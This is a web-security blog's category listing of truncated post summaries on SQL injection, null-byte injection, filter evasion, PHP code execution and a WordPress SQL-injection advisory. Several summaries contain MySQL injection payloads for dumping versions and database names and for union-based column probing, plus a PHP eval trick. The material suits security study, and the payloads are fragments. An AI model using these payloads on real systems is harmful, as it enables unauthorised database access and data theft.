Post category - Web security
Summary: Project: WASC Threat Classification. Threat Type: Attack. Reference ID: WASC-28. Null Byte Injection. Null Byte Injection is an active exploitation technique used to bypass sanity checking filters in web infrastructure by adding URL-encoded null byte characters (i.e. %00, or 0x00 in hex) to the user-supplied
Summary: 1. Check the MySQL version: and+exists(select*from+(select*from(select+name_const(@@version,0))a+join(select+name_const(@@version,0))b)c) 2. Dump all databases: and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,schema_name,0x27,0x7e) FROM information_schema.schemata LIMIT 0,1)) from
Summary: By default, MySQL does not allow remote clients to connect to the MySQL database. If you try to connect to a remote MySQL database from your client system, you will get the "ERROR 1130: Host is not allowed to connect to this MySQL server" message as shown below. $ mysql -h 192.168.1.8 -u root -p Enter passw
Summary: [German] SQL Injection with INFORMATION_SCHEMA. WEBSECURITY DOCUMENTATION: SQL Injection with INFORMATION_SCHEMA ...
Summary: PHP+MySQL manual injection statement collection (recommended). My PHP manual injection skills are weak, so I had no choice but to catch up on PHP/MySQL manual injection; here I share the notes I collected. Find the number of columns: Order by num/* Match the columns: and 1=1 union select 1,2,3,4,5…….n/* Find the column positions: and 1=2 union select 1,2,3,4,5…..n/* Use built-in functions to dump database information: version() database() user() Dump database information without guessing usable columns (does not work on some sites): and 1=2 union all select version() /* and 1=2 union all select database()
Summary: False SQL Injection and Advanced Blind SQL Injection. Exploit Title: False SQL injection and advanced blind SQL injection. Date: 21/12/2011. Author: wh1ant. Company: trinitysoft. Group: secu...
Summary: Essential for penetration testing: the complete Firefox pentest toolkit. To do good work one must first sharpen one's tools, and Firefox has always been an essential tool for penetration testers. Here we recommend 34 Firefox penetration-testing add-ons covering penetration testing, information gathering, proxying, encoding/decoding and more. 1: Firebug. One of Firefox's five-star, strongly recommended add-ons; it needs no explanation. 2: User Agent Switcher. An add-on that changes the client's User Agent. 3: Hackbar. An essential tool for the 91ri.org crew; it provides SQL injection and XSS helpers and can quickly apply various encodings to strings. 4: HttpFox. Monitors and analyzes HTTP traffic between the browser and the web server. 5: Live HTTP Headers. View a website's HTTP headers in real time
Summary: String-type injection: first add a quote to trigger an error, then test http://www.hacker.com/abc.php?text=abc'and '1'='1 The leading quote closes the string; the trailing 1 is left unclosed because the program itself supplies the closing quote. Then test http://www.hacker.com/abc.php?text=abc'order by 1-- http://www.hacker.com/abc.php?text=abc'order by 111111111-- Check carefully whether the page renders normally or errors. Union query: http://www.hacker.com/abc.php?text=abc'and 1=2 unio
Summary: SQLi filter evasion cheat sheet (MySQL). This week I presented my experiences in SQLi filter evasion techniques that I have gained during 3 years of PHPIDS filter evasion at the CONFidence 2.0 conference. You can find the slides here. For a quicker reference you can use the following cheatsheet. More deta
Summary: While participating at some CTF challenges like Codegate10 or OWASPEU10 recently I noticed that it is extremely trendy to build SQL injection challenges with very tough filters which can be circumvented based on the flexible MySQL syntax. In this post I will show some example filters and how to explo
Summary: 1. The PHP file itself is encoded as UTF-8. Use UltraEdit (v11.20a) to convert all ANSI-format PHP files to UTF-8: File --> Conversions --> ASCII to UTF-8 (Unicoding Editing) (in UltraEdit go to Advanced --> configuration --> File Handling --> Unicode/UTF-8 Detection --> tick Auto detect utf-8 files). If needed, run Remove BOM.php. When using WinXP
Summary: Yesterday, almost all installations on our test server had been infected by the infamous "<?php eval(base64_decode(…)) ?>" code injection. We have more than 600 demo sites on our test server and cleaning them using any WordPress plugin out there was simply out of the question! Can you imagine loggin
Summary: <? $_['f']="${@phpinfo()}"; // only executes with double quotes; single quotes do not work ?> demo preg_replace(); <?php $c = "2 4 8"; //echo ($c); //display: 2 4 8 $cp = '/(\d)\s(\d)\s(\d)/e'; //pattern $cr = "'\\3*\\2+\\1='.(('\\3')-('\\2')+('\\1'))"; //r
Summary: WordPress Charset SQL Injection Vulnerability. 11 Dec. 2007. Summary: WordPress is "a state-of-the-art semantic personal publishing platform with a focus on aesthetics, web standards, and usability". It is found that the search function provided within WordPress fails to sanitize input based on d